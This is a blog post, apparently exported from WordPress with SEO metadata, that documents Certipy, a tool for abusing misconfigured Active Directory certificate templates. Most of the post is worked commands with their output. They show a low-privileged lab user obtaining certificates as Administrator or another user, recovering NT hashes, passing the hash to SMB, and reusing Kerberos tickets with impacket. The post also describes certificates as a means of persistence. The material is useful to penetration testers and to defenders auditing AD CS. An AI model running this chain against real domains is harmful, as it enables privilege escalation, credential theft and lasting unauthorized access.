{"id":20530,"date":"2021-11-29T15:30:04","date_gmt":"2021-11-29T15:30:04","guid":{"rendered":"https:\/\/kalilinuxtutorials.com\/?p=20530"},"modified":"2021-11-29T15:30:08","modified_gmt":"2021-11-29T15:30:08","slug":"certipy","status":"publish","type":"post","link":"https:\/\/kalilinuxtutorials.com\/certipy\/","title":{"rendered":"Certipy : Python Implementation For Active Directory Certificate Abuse"},"content":{"rendered":"\n<p><strong>Certipy<\/strong> is a Python tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).<\/p>\n\n\n\n<p>Based on the C# variant&nbsp;Certify&nbsp;from&nbsp;@harmj0y&nbsp;and&nbsp;@tifkin_.<\/p>\n\n\n\n<p class=\"has-text-align-center has-vivid-green-cyan-background-color has-background\"><strong>Installation<\/strong><\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>$ python3 setup.py install<\/strong><\/p>\n\n\n\n<p class=\"has-text-align-center has-vivid-green-cyan-background-color has-background\"><strong>Usage<\/strong><\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>$ certipy -h<br>usage: certipy [-h] [-debug] [-target-ip ip address] [-nameserver nameserver] [-dns-tcp] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-dc-ip ip address]<br>target {find,req,auth,auto} \u2026<br>Active Directory certificate abuse<br>positional arguments:<br>target [[domain\/]username[:password]@]<br>{find,req,auth,auto} Action<br>find Find certificate templates<br>req Request a new certificate<br>auth Authenticate with a certificate<br>auto Automatically abuse certificate templates for privilege escalation<br>optional arguments:<br>-h, &#8211;help show this help message and exit<br>-debug Turn DEBUG output ON<br>-no-pass don&#8217;t ask for password (useful for -k)<br>-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials<br>cannot be found, it will use the ones specified in the command line<br>-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter<br>connection:<br>-target-ip ip address<br>IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the<br>NetBIOS name and you cannot resolve it<br>-nameserver nameserver<br>Nameserver for DNS resolution<br>-dns-tcp Use TCP instead of UDP for DNS queries<br>authentication:<br>-hashes LMHASH:NTHASH<br>NTLM hashes, format is LMHASH:NTHASH<\/strong><\/p>\n\n\n\n<p class=\"has-text-align-center has-vivid-green-cyan-background-color has-background\"><strong>Examples<\/strong><\/p>\n\n\n\n<p class=\"has-light-green-cyan-background-color has-background\"><a href=\"https:\/\/github.com\/ly4k\/Certipy#auto\"><\/a><strong>Auto<\/strong><\/p>\n\n\n\n<p>Automatically abuse certificate templates for privilege escalation. This action will try to find, request and authenticate as the&nbsp;<code><strong>Administrator<\/strong><\/code>&nbsp;user. Upon success, a credential cache will be saved and the NT hash will be decrypted from the PAC in the TGS_REP.<\/p>\n\n\n\n<p>To demonstrate how easy it is to misconfigure certificate templates, the default certificate template&nbsp;<code><strong>Web Server<\/strong><\/code>&nbsp;has been copied to&nbsp;<code><strong>Copy of Web Server<\/strong><\/code>. The only change was that the EKU&nbsp;<code><strong>Server Authentication<\/strong><\/code>&nbsp;was removed and that authenticated users are allowed to enroll. This will allow enrollees to specify the subject and use it for client authentication, i.e. authenticate as any user. If no EKUs are specified, then the certificate can be used for all purposes. Alternatively, one could add the&nbsp;<code><strong>Client Authentication<\/strong><\/code>&nbsp;EKU.<\/p>\n\n\n\n<p>In this example, the user&nbsp;<code><strong>john<\/strong><\/code>&nbsp;is a low privileged user who is allowed to enroll for the&nbsp;<code><strong>Copy of Web Server<\/strong><\/code>&nbsp;template.<\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>$ certipy &#8216;predator\/john:Passw0rd@dc.predator.local&#8217; auto<br>[<em>] Trying template &#8216;Copy of Web Server&#8217; with CA &#8216;predator-DC-CA&#8217; [<\/em>] Generating RSA key<br>[<em>] Requesting certificate [<\/em>] Request success<br>[<em>] Got certificate with UPN &#8216;Administrator&#8217; [<\/em>] Saved certificate to &#8216;1.crt&#8217;<br>[<em>] Saved private key to &#8216;1.key&#8217; [<\/em>] Using UPN: &#8216;Administrator@predator&#8217;<br>[<em>] Trying to get TGT\u2026 [<\/em>] Saved credential cache to &#8216;Administrator.ccache&#8217;<br>[<em>] Trying to retrieve NT hash for &#8216;Administrator@predator&#8217; [<\/em>] Got NT hash for &#8216;Administrator@predator&#8217;: fc525c9683e8fe067095ba2ddc971889<\/strong><\/p>\n\n\n\n<p>By default, the user&nbsp;<code><strong>Administrator<\/strong><\/code>&nbsp;is chosen. Use the&nbsp;<code>-<strong>user<\/strong><\/code>&nbsp;parameter to create a certificate for another user.<\/p>\n\n\n\n<p class=\"has-text-align-center has-vivid-green-cyan-background-color has-background\"><a href=\"https:\/\/github.com\/ly4k\/Certipy#find\"><\/a><strong>Find<\/strong><\/p>\n\n\n\n<p>The&nbsp;<code>find<\/code>&nbsp;action will find certificate templates that are enabled by one or more CAs.<\/p>\n\n\n\n<p class=\"has-light-green-cyan-background-color has-background\"><a href=\"https:\/\/github.com\/ly4k\/Certipy#find-vulnerable-templates\"><\/a><strong>Find vulnerable templates<\/strong><\/p>\n\n\n\n<p>Use the&nbsp;<strong><code>-vulnerable<\/code>&nbsp;<\/strong>parameter to only find vulnerable certificate templates.<\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>$ certipy &#8216;predator\/john:Passw0rd@dc.predator.local&#8217; find -vulnerable<br>[*] Finding vulnerable certificate templates for &#8216;john&#8217;<br>User<br>Name : predator\\john<br>Groups :<br>Certificate Authorities<br>0<br>CA Name : predator-DC-CA<br>DNS Name : dc.predator.local<br>Certificate Subject : CN=predator-DC-CA, DC=predator, DC=local<br>Certificate Serial Number : 1976D0FEFCAFC9A84D02D305FA88D84D<br>Certificate Validity Start : 2021-10-06 11:32:01+00:00<br>Certificate Validity End : 2026-10-06 11:42:01+00:00<br>User Specified SAN : Disabled<br>CA Permissions<br>Owner : BUILTIN\\Administrator<br>Access Rights<br>ManageCertificates : BUILTIN\\Administrator<br>predator\\Domain Admins<br>predator\\Enterprise Admins<br>ManageCa : BUILTIN\\Administrator<br>predator\\Domain Admins<br>predator\\Enterprise Admins<br>Enroll : Authenticated Users<br>Vulnerable Certificate Templates<br>0<br>CAs : predator-DC-CA<br>Template Name : Copy of Web Server<br>Validity Period : 2 years<br>Renewal Period : 6 weeks<br>Certificate Name Flag : EnrolleeSuppliesSubject<br>Enrollment Flag : None<br>Authorized Signatures Required : 0<br>Extended Key Usage :<br>Permissions<br>Enrollment Permissions<br>Enrollment Rights : predator\\Domain Admins<br>predator\\Enterprise Admins<br>Authenticated Users<br>Object Control Permissions<br>Owner : predator\\Administrator<br>Write Owner Principals : predator\\Domain Admins<br>predator\\Enterprise Admins<br>predator\\Administrator<br>Write Dacl Principals : predator\\Domain Admins<br>predator\\Enterprise Admins<br>predator\\Administrator<br>Write Property Principals : predator\\Domain Admins<br>predator\\Enterprise Admins<br>predator\\Administrator<br>Vulnerable Reasons : &#8216;Authenticated Users&#8217; can enroll, enrollee supplies subject and template allows authentication<br>&#8216;Authenticated Users&#8217; can enroll and template has dangerous EKU<\/strong><\/p>\n\n\n\n<p>Use the&nbsp;<code><strong>-user<\/strong><\/code>&nbsp;parameter to find vulnerable certificate templates for another user. By default, the current user will be used.<\/p>\n\n\n\n<p class=\"has-light-green-cyan-background-color has-background\"><a href=\"https:\/\/github.com\/ly4k\/Certipy#find-all-templates\"><\/a><strong>Find all templates<\/strong><\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>$ certipy &#8216;predator\/john:Passw0rd@dc.predator.local&#8217; find<br>[*] Finding certificate templates for &#8216;john&#8217;<br>User<br>Name : predator\\john<br>Groups :<br>Certificate Authorities<br>0<br>CA Name : predator-DC-CA<br>DNS Name : dc.predator.local<br>Certificate Subject : CN=predator-DC-CA, DC=predator, DC=local<br>Certificate Serial Number : 1976D0FEFCAFC9A84D02D305FA88D84D<br>Certificate Validity Start : 2021-10-06 11:32:01+00:00<br>Certificate Validity End : 2026-10-06 11:42:01+00:00<br>User Specified SAN : Disabled<br>CA Permissions<br>Owner : BUILTIN\\Administrator<br>Access Rights<br>ManageCertificates : BUILTIN\\Administrator<br>predator\\Domain Admins<br>predator\\Enterprise Admins<br>ManageCa : BUILTIN\\Administrator<br>predator\\Domain Admins<br>predator\\Enterprise Admins<br>Enroll : Authenticated Users<br>Certificate Templates<br>0<br>CAs : predator-DC-CA<br>Template Name : User<br>Validity Period : 1 year<br>Renewal Period : 6 weeks<br>Certificate Name Flag : SubjectRequireDirectoryPath<br>SubjectRequireEmail<br>SubjectAltRequireEmail<br>SubjectAltRequireUpn<br>Enrollment Flag : AutoEnrollment<br>PublishToDs<br>IncludeSymmetricAlgorithms<br>Authorized Signatures Required : 0<br>Extended Key Usage : Encrypting File System<br>Secure Email<br>Client Authentication<br>Permissions<br>Enrollment Permissions<br>Enrollment Rights : predator\\Domain Admins<br>predator\\Domain Users<br>predator\\Enterprise Admins<br>Object Control Permissions<br>Owner : predator\\Enterprise Admins<br>Write Owner Principals : predator\\Domain Admins<br>predator\\Enterprise Admins<br>Write Dacl Principals : predator\\Domain Admins<br>predator\\Enterprise Admins<br>Write Property Principals : predator\\Domain Admins<br>predator\\Enterprise Admins<br>[\u2026]<br>11<br>CAs : predator-DC-CA<br>Template Name : Copy of Web Server<br>Validity Period : 2 years<br>Renewal Period : 6 weeks<br>Certificate Name Flag : EnrolleeSuppliesSubject<br>Enrollment Flag : None<br>Authorized Signatures Required : 0<br>Extended Key Usage :<br>Permissions<br>Enrollment Permissions<br>Enrollment Rights : predator\\Domain Admins<br>predator\\Enterprise Admins<br>Authenticated Users<br>Object Control Permissions<br>Owner : predator\\Administrator<br>Write Owner Principals : predator\\Domain Admins<br>predator\\Enterprise Admins<br>predator\\Administrator<br>Write Dacl Principals : predator\\Domain Admins<br>predator\\Enterprise Admins<br>predator\\Administrator<br>Write Property Principals : predator\\Domain Admins<br>predator\\Enterprise Admins<br>predator\\Administrator<\/strong><\/p>\n\n\n\n<p class=\"has-text-align-center has-vivid-green-cyan-background-color has-background\"><strong>Request<\/strong><\/p>\n\n\n\n<p>Request a new certificate from a certificate template. By default, the current user specified in the&nbsp;<code><strong>target<\/strong><\/code>&nbsp;parameter will be used.<\/p>\n\n\n\n<p class=\"has-light-green-cyan-background-color has-background\"><a href=\"https:\/\/github.com\/ly4k\/Certipy#request-as-another-user\"><\/a><strong>Request as another user<\/strong><\/p>\n\n\n\n<p>To request a certificate as another user, use the&nbsp;<code><strong>-alt<\/strong><\/code>&nbsp;parameter. This only applies to certificate templates, where the enrollee specifies the subject, or when the CA allows the enrollee to specify a UPN, i.e.&nbsp;<code><strong>User Specified SAN<\/strong><\/code>&nbsp;is set to&nbsp;<code><strong>Enabled<\/strong><\/code>.<\/p>\n\n\n\n<p>In this example, the user&nbsp;<code><strong>john<\/strong><\/code>&nbsp;is a low privileged user. The certificate template&nbsp;<code><strong>Copy of Web Server<\/strong><\/code>&nbsp;is a copy of the default&nbsp;<code><strong>Web<\/strong> <strong>Server<\/strong><\/code>&nbsp;template. The EKU&nbsp;<code><strong>Server Authentication<\/strong><\/code>&nbsp;was removed, such that the template has no EKUs (No EKUs = any purpose). The default&nbsp;<code><em>Web Server<\/em><\/code>&nbsp;template allows the enrollee to supply the subject.<\/p>\n\n\n\n<p><code><strong>john<\/strong><\/code>&nbsp;will request a certificate valid for authentication as&nbsp;<code><strong>jane<\/strong><\/code>. The CA&nbsp;<code><strong>predator-DC-CA<\/strong><\/code>&nbsp;has&nbsp;<code><strong>Copy of Web Server<\/strong><\/code>&nbsp;enabled.<\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>$ certipy &#8216;predator\/john:Passw0rd@dc.predator.local&#8217; req -template &#8216;Copy of Web Server&#8217; -ca &#8216;predator-DC-CA&#8217; -alt &#8216;jane&#8217;<br>[<em>] Generating RSA key [<\/em>] Requesting certificate<br>[<em>] Request success [<\/em>] Got certificate with UPN &#8216;jane&#8217;<br>[<em>] Saved certificate to &#8216;2.crt&#8217; [<\/em>] Saved private key to &#8216;2.key&#8217;<\/strong><\/p>\n\n\n\n<p>The certificate and key will be DER encoded and saved to&nbsp;<code><strong>&lt;request ID&gt;.(crt|key)<\/strong><\/code>, where&nbsp;<code><strong>request ID<\/strong><\/code>&nbsp;is returned by the server.<\/p>\n\n\n\n<p class=\"has-light-green-cyan-background-color has-background\"><a href=\"https:\/\/github.com\/ly4k\/Certipy#request-as-self\"><\/a><strong>Request as self<\/strong><\/p>\n\n\n\n<p>It is also possible to request a certificate for the current user. This is a good option for persistence since a certificate is not affected by password changes. By default, domain users are allowed to enroll in the default&nbsp;<code><strong>Use<\/strong>r<\/code>&nbsp;template.<\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>$ certipy &#8216;predator\/john:Passw0rd@dc.predator.local&#8217; req -template &#8216;User&#8217; -ca &#8216;predator-DC-CA&#8217;<br>[<em>] Generating RSA key [<\/em>] Requesting certificate<br>[<em>] Request success [<\/em>] Got certificate with UPN &#8216;john@predator.local&#8217;<br>[<em>] Saved certificate to &#8216;3.crt&#8217; [<\/em>] Saved private key to &#8216;3.key&#8217;<\/strong><\/p>\n\n\n\n<p class=\"has-text-align-center has-vivid-green-cyan-background-color has-background\"><strong>Authenticate<\/strong><\/p>\n\n\n\n<p>The&nbsp;<code>auth<\/code>&nbsp;action will use the PKINIT Kerberos extension to authenticate with the provided certificate. The target user must be specified in the&nbsp;<code><strong>target<\/strong><\/code>&nbsp;parameter. If not specified, Certipy will try to extract the UPN from the certificate. The TGT will be saved in a credential cache to&nbsp;<code><strong>&lt;username&gt;.ccach<\/strong>e<\/code>.<\/p>\n\n\n\n<p>The NT hash will be extracted by using Kerberos U2U to request a TGS for the current user, where the encrypted PAC will contain the NT hash, which can be decrypted.<\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>$ certipy &#8216;predator\/jane@dc.predator.local&#8217; auth -cert .\/2.crt -key .\/2.key<br>[<em>] Using UPN: &#8216;jane@predator&#8217; [<\/em>] Trying to get TGT\u2026<br>[<em>] Saved credential cache to &#8216;jane.ccache&#8217; [<\/em>] Trying to retrieve NT hash for &#8216;jane@predator&#8217;<br>[*] Got NT hash for &#8216;jane@predator&#8217;: 077cccc23f8ab7031726a3b70c694a49<\/strong><\/p>\n\n\n\n<p class=\"has-text-align-center has-vivid-green-cyan-background-color has-background\"><strong>Using the NT hash<\/strong><\/p>\n\n\n\n<p>You can simply pass-the-hash (PTH) for many services. For instance SMB:<\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>$ impacket-smbclient -hashes :fc525c9683e8fe067095ba2ddc971889 &#8216;predator.local\/administrator@dc.predator.local&#8217;<br>Impacket v0.9.23 &#8211; Copyright 2021 SecureAuth Corporation<br>Type help for list of commands<br>who<br>host: \\172.16.19.1, user: administrator, active: 1, idle: 0<\/strong><\/p>\n\n\n\n<p class=\"has-text-align-center has-vivid-green-cyan-background-color has-background\"><strong>Using the credential cache<\/strong><\/p>\n\n\n\n<p>The credential cache currently holds a TGT. The TGT can be used to request TGSs for services. For instance, to request a TGS for the&nbsp;<code><strong>cifs<\/strong><\/code>&nbsp;(SMB) service at&nbsp;<code><strong>dc.predator.local<\/strong><\/code>:<\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>$ # use TGT from Certipy<br>$ export KRB5CCNAME=.\/Administrator.ccache<br>$ # request TGS<br>$ impacket-getST -spn &#8216;cifs\/dc.predator.local&#8217; -dc-ip 172.16.19.100 -no-pass -k &#8216;predator\/administrator&#8217;<br>$ # use TGS from impacket-getST<br>$ export KRB5CCNAME=.\/administrator.ccache<br>$ # run smbclient with TGS (notice the FQDN)<br>$ impacket-smbclient -k -no-pass &#8216;predator.local\/administrator@dc.predator.local&#8217;<br>Impacket v0.9.23 &#8211; Copyright 2021 SecureAuth Corporation<br>Type help for list of commands<br>#who<br>host: \\172.16.19.1, user: Administrator, active: 1, idle: 0<\/strong><\/p>\n\n\n\n<p class=\"has-luminous-vivid-amber-background-color has-background\"><strong>Note<\/strong>&nbsp;that&nbsp;<code>impacket-getST<\/code>&nbsp;will overwrite the credential cache at&nbsp;<code>&lt;username&gt;.ccache<\/code>. Create a copy of the credential cache from Certipy before requesting a TGS with&nbsp;<code>impacket-getST<\/code>.<\/p>\n\n\n\n<div class=\"wp-block-buttons is-content-justification-center is-layout-flex wp-block-buttons-is-layout-flex\">\n<div class=\"wp-block-button is-style-outline is-style-outline--1\"><a class=\"wp-block-button__link has-vivid-cyan-blue-background-color has-background\" href=\"https:\/\/github.com\/ly4k\/Certipy\"><strong>Download<\/strong><\/a><\/div>\n<\/div>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Certipy is a Python tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS). Based on the C# variant&nbsp;Certify&nbsp;from&nbsp;@harmj0y&nbsp;and&nbsp;@tifkin_. Installation $ python3 setup.py install Usage $ certipy -husage: certipy [-h] [-debug] [-target-ip ip address] [-nameserver nameserver] [-dns-tcp] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-dc-ip ip address]target {find,req,auth,auto} \u2026Active Directory certificate abusepositional arguments:target [[domain\/]username[:password]@]{find,req,auth,auto} Actionfind [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":20546,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEg3sUJOtECI-8uHdvFxy8_2Su7ZusmuSNXs7txzYdzE0ixl3sEPfGaZBOzuE7IqilBuUIhA5fbO_II1c_QCD9lk7ymmVqdZn4GmvegOnvmtwFFvM0U_xFB8M0xfp-rk-y9DwQSNcGd7658SSS-T2WiSggfpCRJChlXwkaMeJaUWhvMXwfseA6IZ6nmN=s728","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[28],"tags":[4483,4482,2676],"class_list":["post-20530","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-kali","tag-active-directory-certificate-abuse","tag-certipy","tag-python"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Certipy : Python Implementation For Active Directory Certificate Abuse<\/title>\n<meta name=\"description\" content=\"Certipy is a Python tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/kalilinuxtutorials.com\/certipy\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Certipy : Python Implementation For Active Directory Certificate Abuse\" \/>\n<meta property=\"og:description\" content=\"Certipy is a Python tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).\" \/>\n<meta property=\"og:url\" content=\"https:\/\/kalilinuxtutorials.com\/certipy\/\" \/>\n<meta property=\"og:site_name\" content=\"Kali Linux Tutorials\" \/>\n<meta property=\"article:published_time\" content=\"2021-11-29T15:30:04+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-11-29T15:30:08+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEg3sUJOtECI-8uHdvFxy8_2Su7ZusmuSNXs7txzYdzE0ixl3sEPfGaZBOzuE7IqilBuUIhA5fbO_II1c_QCD9lk7ymmVqdZn4GmvegOnvmtwFFvM0U_xFB8M0xfp-rk-y9DwQSNcGd7658SSS-T2WiSggfpCRJChlXwkaMeJaUWhvMXwfseA6IZ6nmN=s728\" \/>\n<meta name=\"author\" content=\"R K\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEg3sUJOtECI-8uHdvFxy8_2Su7ZusmuSNXs7txzYdzE0ixl3sEPfGaZBOzuE7IqilBuUIhA5fbO_II1c_QCD9lk7ymmVqdZn4GmvegOnvmtwFFvM0U_xFB8M0xfp-rk-y9DwQSNcGd7658SSS-T2WiSggfpCRJChlXwkaMeJaUWhvMXwfseA6IZ6nmN=s728\" \/>\n<meta name=\"twitter:creator\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:site\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"R K\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/certipy\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/certipy\/\"},\"author\":{\"name\":\"R K\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\"},\"headline\":\"Certipy : Python Implementation For Active Directory Certificate Abuse\",\"datePublished\":\"2021-11-29T15:30:04+00:00\",\"dateModified\":\"2021-11-29T15:30:08+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/certipy\/\"},\"wordCount\":1455,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/certipy\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEg3sUJOtECI-8uHdvFxy8_2Su7ZusmuSNXs7txzYdzE0ixl3sEPfGaZBOzuE7IqilBuUIhA5fbO_II1c_QCD9lk7ymmVqdZn4GmvegOnvmtwFFvM0U_xFB8M0xfp-rk-y9DwQSNcGd7658SSS-T2WiSggfpCRJChlXwkaMeJaUWhvMXwfseA6IZ6nmN=s728\",\"keywords\":[\"Active Directory Certificate Abuse\",\"Certipy\",\"Python\"],\"articleSection\":[\"Kali Linux\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/certipy\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/certipy\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/certipy\/\",\"name\":\"Certipy : Python Implementation For Active Directory Certificate Abuse\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/certipy\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/certipy\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEg3sUJOtECI-8uHdvFxy8_2Su7ZusmuSNXs7txzYdzE0ixl3sEPfGaZBOzuE7IqilBuUIhA5fbO_II1c_QCD9lk7ymmVqdZn4GmvegOnvmtwFFvM0U_xFB8M0xfp-rk-y9DwQSNcGd7658SSS-T2WiSggfpCRJChlXwkaMeJaUWhvMXwfseA6IZ6nmN=s728\",\"datePublished\":\"2021-11-29T15:30:04+00:00\",\"dateModified\":\"2021-11-29T15:30:08+00:00\",\"description\":\"Certipy is a Python tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/certipy\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/certipy\/#primaryimage\",\"url\":\"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEg3sUJOtECI-8uHdvFxy8_2Su7ZusmuSNXs7txzYdzE0ixl3sEPfGaZBOzuE7IqilBuUIhA5fbO_II1c_QCD9lk7ymmVqdZn4GmvegOnvmtwFFvM0U_xFB8M0xfp-rk-y9DwQSNcGd7658SSS-T2WiSggfpCRJChlXwkaMeJaUWhvMXwfseA6IZ6nmN=s728\",\"contentUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEg3sUJOtECI-8uHdvFxy8_2Su7ZusmuSNXs7txzYdzE0ixl3sEPfGaZBOzuE7IqilBuUIhA5fbO_II1c_QCD9lk7ymmVqdZn4GmvegOnvmtwFFvM0U_xFB8M0xfp-rk-y9DwQSNcGd7658SSS-T2WiSggfpCRJChlXwkaMeJaUWhvMXwfseA6IZ6nmN=s728\",\"width\":\"728\",\"height\":\"380\"},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"name\":\"Kali Linux Tutorials\",\"description\":\"Kali Linux Tutorials\",\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\",\"name\":\"Kali Linux Tutorials\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"contentUrl\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"width\":272,\"height\":90,\"caption\":\"Kali Linux Tutorials\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/CyberEdition\",\"https:\/\/www.threads.com\/@cybersecurityedition\",\"https:\/\/www.linkedin.com\/company\/cyberedition\",\"https:\/\/www.instagram.com\/cybersecurityedition\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\",\"name\":\"R K\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"caption\":\"R K\"},\"url\":\"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Certipy : Python Implementation For Active Directory Certificate Abuse","description":"Certipy is a Python tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/kalilinuxtutorials.com\/certipy\/","og_locale":"en_US","og_type":"article","og_title":"Certipy : Python Implementation For Active Directory Certificate Abuse","og_description":"Certipy is a Python tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).","og_url":"https:\/\/kalilinuxtutorials.com\/certipy\/","og_site_name":"Kali Linux Tutorials","article_published_time":"2021-11-29T15:30:04+00:00","article_modified_time":"2021-11-29T15:30:08+00:00","og_image":[{"url":"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEg3sUJOtECI-8uHdvFxy8_2Su7ZusmuSNXs7txzYdzE0ixl3sEPfGaZBOzuE7IqilBuUIhA5fbO_II1c_QCD9lk7ymmVqdZn4GmvegOnvmtwFFvM0U_xFB8M0xfp-rk-y9DwQSNcGd7658SSS-T2WiSggfpCRJChlXwkaMeJaUWhvMXwfseA6IZ6nmN=s728","type":"","width":"","height":""}],"author":"R K","twitter_card":"summary_large_image","twitter_image":"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEg3sUJOtECI-8uHdvFxy8_2Su7ZusmuSNXs7txzYdzE0ixl3sEPfGaZBOzuE7IqilBuUIhA5fbO_II1c_QCD9lk7ymmVqdZn4GmvegOnvmtwFFvM0U_xFB8M0xfp-rk-y9DwQSNcGd7658SSS-T2WiSggfpCRJChlXwkaMeJaUWhvMXwfseA6IZ6nmN=s728","twitter_creator":"@CyberEdition","twitter_site":"@CyberEdition","twitter_misc":{"Written by":"R K","Est. reading time":"7 